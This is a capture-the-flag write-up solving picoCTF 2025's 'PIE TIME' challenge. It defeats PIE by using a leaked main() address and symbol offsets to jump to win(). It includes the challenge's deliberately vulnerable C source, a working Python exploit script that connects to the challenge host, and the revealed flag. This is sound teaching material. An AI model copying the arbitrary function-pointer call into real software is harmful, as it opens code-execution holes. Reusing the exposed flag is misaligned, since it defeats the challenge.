picoCTF 2025 writeup PIE TIME

Posted at 2025-04-22

PIE TIME (Binary Exploitation)

Can you try to get the flag? Beware we have PIE! Connect to the program with netcat:

$ nc rescued-float.picoctf.net 56039

The program's source code can be downloaded here. The binary can be downloaded here.

Attachments:
・vuln.c
・vuln

First, just run it and see what it does.

$ nc rescued-float.picoctf.net 56039
Address of main: 0x5b040547233d
Enter the address to jump to, ex => 0x12345: 0x5b040547233d
Your input: 5b040547233d
Address of main: 0x5b040547233d
Enter the address to jump to, ex => 0x12345:

Apparently we can make the program jump to an arbitrary address.
Let's check the source code.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL)
  {
      printf("Cannot open file.\n");
      exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF)
  {
      printf ("%c", c);
      c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  printf("Address of main: %p\n", &main);

  unsigned long val;
  printf("Enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);
  printf("Your input: %lx\n", val);

  // Cast the user-supplied value to a function pointer and call it:
  // this indirect call to an arbitrary address is the intended bug.
  void (*foo)(void) = (void (*)())val;
  foo();
}

There is a win() function that prints flag.txt, so entering the address of win() should give us the flag.

$ checksec vuln
[*] '/home/colza-picoctf/vuln'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

PIE is enabled, so the absolute address of win() changes on every run; only the leaked address of main() is known. Since the binary is not stripped (checksec: Stripped: No), the offsets of both functions can be read from the symbol table and the difference between main() and win() computed ahead of time.

66: 00000000000012a7   150 FUNC    GLOBAL DEFAULT   16 win
67: 0000000000004020     0 NOTYPE  GLOBAL DEFAULT   26 _end
68: 00000000000011a0    47 FUNC    GLOBAL DEFAULT   16 _start
69: 0000000000004010     0 NOTYPE  GLOBAL DEFAULT   26 __bss_start
70: 000000000000133d   204 FUNC    GLOBAL DEFAULT   16 main

The difference is 0x12a7 - 0x133d = -0x96.
So we enter the address of main printed at run time with 0x96 subtracted (i.e. -0x96 added). As a sanity check, the leaked main address minus 0x133d should end in 000, since the PIE base is page-aligned.
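The same computation as a small script, so that the offset arithmetic does not have to be done by hand each time the address changes. This is an added example, not part of the original writeup or the picoCTF challenge files; it assumes the offsets 0x133d (main) and 0x12a7 (win) from the symbol table above, parses the "Address of main:" banner with the standard library only, and includes an optional solve_remote() helper built on the plain socket module (the host and port are the ones given in the challenge text, but nothing here contacts the network unless that function is called).

```python
import re
import socket

# Offsets taken from the symbol table of the vuln binary (see above).
MAIN_OFFSET = 0x133d
WIN_OFFSET = 0x12a7

LEAK_RE = re.compile(rb"Address of main: 0x([0-9a-fA-F]+)")


def parse_main_leak(banner: bytes) -> int:
    """Extract the leaked main() address from the program's banner."""
    m = LEAK_RE.search(banner)
    if not m:
        raise ValueError("no 'Address of main' leak found in banner")
    return int(m.group(1), 16)


def pie_base(main_addr: int) -> int:
    """Recover the PIE load base from the leaked main() address.

    The base is page-aligned, so a non-zero low 12 bits means the main
    offset does not match the binary that is actually running.
    """
    base = main_addr - MAIN_OFFSET
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page-aligned; wrong MAIN_OFFSET?")
    return base


def win_address(main_addr: int) -> int:
    """Runtime address of win(): base + static offset of win."""
    return pie_base(main_addr) + WIN_OFFSET


def payload_for(main_addr: int) -> bytes:
    """Input line for scanf("%lx"): the 0x prefix is accepted, newline ends it."""
    return b"0x%x\n" % win_address(main_addr)


def solve_remote(host: str = "rescued-float.picoctf.net", port: int = 56039,
                 timeout: float = 5.0) -> bytes:
    """Connect, read the leak, send the win() address, return what follows."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = b""
        while b"ex => 0x12345:" not in banner:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("server closed before the prompt")
            banner += chunk
        s.sendall(payload_for(parse_main_leak(banner)))
        out = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                out += chunk
        except socket.timeout:
            pass
        return out


if __name__ == "__main__":
    # Constructed sample banner: the values from the run shown in this writeup.
    sample = (b"Address of main: 0x628f1fcd933d\n"
              b"Enter the address to jump to, ex => 0x12345: ")
    leak = parse_main_leak(sample)
    print(f"main at {leak:#x}, PIE base {pie_base(leak):#x}, "
          f"send {payload_for(leak)!r}")
```

Running the script offline reproduces the address entered below; calling solve_remote() performs the same exchange against the live instance.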

$ nc rescued-float.picoctf.net 56039
Address of main: 0x628f1fcd933d
Enter the address to jump to, ex => 0x12345: 0x628f1fcd92a7
Your input: 628f1fcd92a7
You won!
picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_ecb96bdd}

We got the flag.

picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_ecb96bdd}
